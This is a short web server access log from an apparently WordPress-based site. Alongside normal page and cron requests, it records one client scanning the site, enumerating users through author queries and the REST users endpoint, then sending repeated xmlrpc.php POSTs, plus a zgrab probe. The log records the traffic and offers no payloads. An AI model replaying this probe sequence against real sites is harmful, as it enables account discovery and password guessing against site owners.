176.65.149.245 - - [19/Sep/2025:06:26:45 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Sep/2025:06:33:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758234801.4057838916778564453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.124.175.86 - - [19/Sep/2025:06:33:21 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
206.189.157.135 - - [19/Sep/2025:06:36:46 +0800] "GET / HTTP/1.1" 200 165874 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:47 +0800] "GET /wp-includes/ID3/license.txt HTTP/1.1" 200 1396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
36.133.115.36 - - [19/Sep/2025:06:36:47 +0800] "POST /wp-cron.php?doing_wp_cron=1758235007.8041260242462158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.189.157.135 - - [19/Sep/2025:06:36:47 +0800] "GET /feed/ HTTP/1.1" 200 82044 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:48 +0800] "GET /xmlrpc.php?rsd HTTP/1.1" 200 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:49 +0800] "GET /?author=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:49 +0800] "GET /?author=2 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:50 +0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:51 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [19/Sep/2025:06:36:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
